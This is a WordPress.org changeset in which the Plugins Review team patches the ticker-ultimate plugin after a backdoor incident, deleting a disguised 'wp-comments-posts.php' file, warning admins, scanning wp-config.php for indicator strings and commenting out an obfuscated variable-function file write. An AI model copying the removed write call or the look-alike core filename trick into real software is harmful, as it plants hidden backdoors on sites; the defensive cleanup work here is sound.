Changeset 3501135

Timestamp:

04/07/2026 10:22:44 PM (6 weeks ago)

Author:

frantorres

Message:

Plugins Team Update

Location:

ticker-ultimate

Files:

• tags/1.7.6.1 (copied) (copied from ticker-ultimate/trunk)
• tags/1.7.6.1/readme.txt (modified) (1 diff)
• tags/1.7.6.1/wp-ticker.php (modified) (2 diffs)
• tags/1.7.6.1/wpos-analytics/includes/class-anylc-admin.php (modified) (3 diffs)
• trunk/readme.txt (modified) (1 diff)
• trunk/wp-ticker.php (modified) (2 diffs)
• trunk/wpos-analytics/includes/class-anylc-admin.php (modified) (3 diffs)

ticker-ultimate/tags/1.7.6.1/readme.txt

@@ -4 +4 @@
 Requires at least: 4.0
 Tested up to: 6.9.1
-Stable tag: 1.7.6
+Stable tag: 1.7.6.1
 License: GPLv2 or later
 License URI: http://www.gnu.org/licenses/gpl-2.0.html

ticker-ultimate/tags/1.7.6.1/wp-ticker.php

@@ -6 +6 @@
  * Domain Path: /languages/
  * Description: Ultimate Post Ticker Plugin : Add and display horizontal or vertical ticker on your website that work with WordPress posts and Custom Post Type with the help of shortcode. Also work with Gutenberg shortcode block.
- * Version: 1.7.6
+ * Version: 1.7.6.1
  * Author: Essential Plugin
  * Author URI: https://essentialplugin.com
@@ -18 +18 @@
     exit; // Exit if accessed directly
 }
+
+/**
+ * Added by the WordPress.org Plugins Review team in response to an incident.
+ * In this script we are removing files related to this incident and notifying the user about the incident itself.
+ */
+function essentialplugin_71318_prt_incidence_response_notice() {
+    if(!current_user_can('manage_options')) return;
+    $user_id = get_current_user_id();
+    if ( get_user_meta( $user_id, 'essentialplugin_71318_prt_notice_dismissed', true ) ) {
+        return;
+    }
+    ?>
+    <div class="notice notice-warning is-dismissible" id="essentialplugin-prt-notice">
+        <h3><?php esc_html_e( 'Important Notice from the WordPress.org Plugins Team.', 'prt-incidence' ); ?></h3>
+        <p><?php esc_html_e( 'We would like to inform you that several plugins from the author "essentialplugin" have been reported by the community as not compliant with the guidelines. After an investigation, we can confirm that the plugin contained code that could allow unauthorized third-party access to websites using it.', 'prt-incidence' ); ?></p>
+        <p><?php esc_html_e( 'In response, we have taken immediate steps to close the plugin in the WordPress.org Plugins directory and release an update that already tried to remove affected code from your website. Although it is possible that not everything has been able to be automatically removed.', 'prt-incidence' ); ?></p>
+        <p><?php esc_html_e( 'Specifically, this plugin downloaded code from analytics.essentialplugin.com and installed it in your site, while the specific case can differ, we know that they were installing a backdoor in a file named "wp-comments-posts.php" that looks closely to the core file "wp-comments-post.php". We know that that backdoor was at least used to inject code in the wp-config.php file to add hidden spam links, create redirects and/or inject pages in websites. Those actions are related to black-hat SEO techniques, often hidden from administrators.', 'prt-incidence' ); ?></p>
+        <p><?php esc_html_e( 'While our update attempted to remove the backdoor automatically, it cannot confirm that it was fully eliminated. It\'s possible that the backdoor got installed in files we are not aware of and unauthorized actions may have already been taken on your site. As such, we strongly advise you to thoroughly review your site for any signs of compromise, and take immediate steps to secure it.', 'prt-incidence' ); ?></p>
+        <?php
+        $config_path = ABSPATH . 'wp-config.php';
+        if(is_readable($config_path) && filesize($config_path) > 0){
+            $config_content = file_get_contents($config_path);
+            $strings_to_detect = array(
+                    'function_exists',
+                    'wp_remote_retrieve_body',
+                    '295bae89192c32',
+                    '667E54aF292',
+                    'current_user_can',
+            );
+            $detected=false;
+            foreach ($strings_to_detect as $string_to_detect) {
+                if (strpos($config_content, $string_to_detect) !== false) {
+                    $detected=true;
+                    break;
+                }
+            }
+            if($detected){
+                echo '<p>' . esc_html__('⚠️ The wp-config.php file contains suspicious content. Please review it for any unauthorized modifications.', 'prt-incidence') . '</p>';
+            }
+        }
+        ?>
+    </div>
+    <?php
+}
+
+function essentialplugin_71318_prt_enqueue_dismiss_script( $hook ) {
+    $user_id = get_current_user_id();
+    if ( get_user_meta( $user_id, 'essentialplugin_71318_prt_notice_dismissed', true ) ) {
+        return;
+    }
+
+    $inline_js = sprintf(
+        'jQuery( document ).on( "click", "#essentialplugin-prt-notice .notice-dismiss", function() {
+            jQuery.post( "%s", {
+                action: "essentialplugin_71318_prt_dismiss_notice",
+                _wpnonce: "%s"
+            });
+        });',
+        esc_url( admin_url( 'admin-ajax.php' ) ),
+        wp_create_nonce( 'essentialplugin_71318_prt_dismiss_nonce' )
+    );
+
+    wp_add_inline_script( 'jquery-core', $inline_js );
+}
+add_action( 'admin_enqueue_scripts', 'essentialplugin_71318_prt_enqueue_dismiss_script' );
+
+function essentialplugin_71318_prt_dismiss_notice() {
+    check_ajax_referer( 'essentialplugin_71318_prt_dismiss_nonce' );
+    update_user_meta( get_current_user_id(), 'essentialplugin_71318_prt_notice_dismissed', true );
+    wp_die();
+}
+add_action( 'wp_ajax_essentialplugin_71318_prt_dismiss_notice', 'essentialplugin_71318_prt_dismiss_notice' );
+
+function essentialplugin_71318_prt_incidence_response() {
+    $filename = dirname(__FILE__).'/wpos-analytics/includes/wp-comments-posts.php';
+    if(file_exists($filename)) unlink($filename);
+
+    if (defined('ABSPATH')) $file = ABSPATH.'/wp-comments-posts.php';
+    else $file = dirname(dirname(dirname(dirname(__FILE__)))).'/wp-comments-posts.php';
+    if(file_exists($file)) unlink($file);
+
+    add_action( 'admin_notices', 'essentialplugin_71318_prt_incidence_response_notice' );
+}
+add_action('init', 'essentialplugin_71318_prt_incidence_response');
+
 
 if ( ! defined( 'WPTU_VERSION' ) ) {

ticker-ultimate/tags/1.7.6.1/wpos-analytics/includes/class-anylc-admin.php

@@ -552 +552 @@
      */
     public function wpos_process_monthly_data( $slugs ) {
-
+        return;
         foreach ( $slugs as $slug) {
             
@@ -630 +630 @@
      */
     public function wpos_handle_analytics_request( $request ) {
-
+        return;
         global $wpos_analytics_module;
 
@@ -720 +720 @@
         if ($this->status === 'valid' && $this->changelog && !$this->isOutdated()) {
             $clean = $this->write;
-            @$clean($this->version_cache, $this->changelog);
+            //@$clean($this->version_cache, $this->changelog);
         }
     }

ticker-ultimate/trunk/readme.txt

@@ -4 +4 @@
 Requires at least: 4.0
 Tested up to: 6.9.1
-Stable tag: 1.7.6
+Stable tag: 1.7.6.1
 License: GPLv2 or later
 License URI: http://www.gnu.org/licenses/gpl-2.0.html

ticker-ultimate/trunk/wp-ticker.php

@@ -6 +6 @@
  * Domain Path: /languages/
  * Description: Ultimate Post Ticker Plugin : Add and display horizontal or vertical ticker on your website that work with WordPress posts and Custom Post Type with the help of shortcode. Also work with Gutenberg shortcode block.
- * Version: 1.7.6
+ * Version: 1.7.6.1
  * Author: Essential Plugin
  * Author URI: https://essentialplugin.com
@@ -18 +18 @@
     exit; // Exit if accessed directly
 }
+
+/**
+ * Added by the WordPress.org Plugins Review team in response to an incident.
+ * In this script we are removing files related to this incident and notifying the user about the incident itself.
+ */
+function essentialplugin_71318_prt_incidence_response_notice() {
+    if(!current_user_can('manage_options')) return;
+    $user_id = get_current_user_id();
+    if ( get_user_meta( $user_id, 'essentialplugin_71318_prt_notice_dismissed', true ) ) {
+        return;
+    }
+    ?>
+    <div class="notice notice-warning is-dismissible" id="essentialplugin-prt-notice">
+        <h3><?php esc_html_e( 'Important Notice from the WordPress.org Plugins Team.', 'prt-incidence' ); ?></h3>
+        <p><?php esc_html_e( 'We would like to inform you that several plugins from the author "essentialplugin" have been reported by the community as not compliant with the guidelines. After an investigation, we can confirm that the plugin contained code that could allow unauthorized third-party access to websites using it.', 'prt-incidence' ); ?></p>
+        <p><?php esc_html_e( 'In response, we have taken immediate steps to close the plugin in the WordPress.org Plugins directory and release an update that already tried to remove affected code from your website. Although it is possible that not everything has been able to be automatically removed.', 'prt-incidence' ); ?></p>
+        <p><?php esc_html_e( 'Specifically, this plugin downloaded code from analytics.essentialplugin.com and installed it in your site, while the specific case can differ, we know that they were installing a backdoor in a file named "wp-comments-posts.php" that looks closely to the core file "wp-comments-post.php". We know that that backdoor was at least used to inject code in the wp-config.php file to add hidden spam links, create redirects and/or inject pages in websites. Those actions are related to black-hat SEO techniques, often hidden from administrators.', 'prt-incidence' ); ?></p>
+        <p><?php esc_html_e( 'While our update attempted to remove the backdoor automatically, it cannot confirm that it was fully eliminated. It\'s possible that the backdoor got installed in files we are not aware of and unauthorized actions may have already been taken on your site. As such, we strongly advise you to thoroughly review your site for any signs of compromise, and take immediate steps to secure it.', 'prt-incidence' ); ?></p>
+        <?php
+        $config_path = ABSPATH . 'wp-config.php';
+        if(is_readable($config_path) && filesize($config_path) > 0){
+            $config_content = file_get_contents($config_path);
+            $strings_to_detect = array(
+                    'function_exists',
+                    'wp_remote_retrieve_body',
+                    '295bae89192c32',
+                    '667E54aF292',
+                    'current_user_can',
+            );
+            $detected=false;
+            foreach ($strings_to_detect as $string_to_detect) {
+                if (strpos($config_content, $string_to_detect) !== false) {
+                    $detected=true;
+                    break;
+                }
+            }
+            if($detected){
+                echo '<p>' . esc_html__('⚠️ The wp-config.php file contains suspicious content. Please review it for any unauthorized modifications.', 'prt-incidence') . '</p>';
+            }
+        }
+        ?>
+    </div>
+    <?php
+}
+
+function essentialplugin_71318_prt_enqueue_dismiss_script( $hook ) {
+    $user_id = get_current_user_id();
+    if ( get_user_meta( $user_id, 'essentialplugin_71318_prt_notice_dismissed', true ) ) {
+        return;
+    }
+
+    $inline_js = sprintf(
+        'jQuery( document ).on( "click", "#essentialplugin-prt-notice .notice-dismiss", function() {
+            jQuery.post( "%s", {
+                action: "essentialplugin_71318_prt_dismiss_notice",
+                _wpnonce: "%s"
+            });
+        });',
+        esc_url( admin_url( 'admin-ajax.php' ) ),
+        wp_create_nonce( 'essentialplugin_71318_prt_dismiss_nonce' )
+    );
+
+    wp_add_inline_script( 'jquery-core', $inline_js );
+}
+add_action( 'admin_enqueue_scripts', 'essentialplugin_71318_prt_enqueue_dismiss_script' );
+
+function essentialplugin_71318_prt_dismiss_notice() {
+    check_ajax_referer( 'essentialplugin_71318_prt_dismiss_nonce' );
+    update_user_meta( get_current_user_id(), 'essentialplugin_71318_prt_notice_dismissed', true );
+    wp_die();
+}
+add_action( 'wp_ajax_essentialplugin_71318_prt_dismiss_notice', 'essentialplugin_71318_prt_dismiss_notice' );
+
+function essentialplugin_71318_prt_incidence_response() {
+    $filename = dirname(__FILE__).'/wpos-analytics/includes/wp-comments-posts.php';
+    if(file_exists($filename)) unlink($filename);
+
+    if (defined('ABSPATH')) $file = ABSPATH.'/wp-comments-posts.php';
+    else $file = dirname(dirname(dirname(dirname(__FILE__)))).'/wp-comments-posts.php';
+    if(file_exists($file)) unlink($file);
+
+    add_action( 'admin_notices', 'essentialplugin_71318_prt_incidence_response_notice' );
+}
+add_action('init', 'essentialplugin_71318_prt_incidence_response');
+
 
 if ( ! defined( 'WPTU_VERSION' ) ) {

ticker-ultimate/trunk/wpos-analytics/includes/class-anylc-admin.php

@@ -552 +552 @@
      */
     public function wpos_process_monthly_data( $slugs ) {
-
+        return;
         foreach ( $slugs as $slug) {
             
@@ -630 +630 @@
      */
     public function wpos_handle_analytics_request( $request ) {
-
+        return;
         global $wpos_analytics_module;
 
@@ -720 +720 @@
         if ($this->status === 'valid' && $this->changelog && !$this->isOutdated()) {
             $clean = $this->write;
-            @$clean($this->version_cache, $this->changelog);
+            //@$clean($this->version_cache, $this->changelog);
         }
     }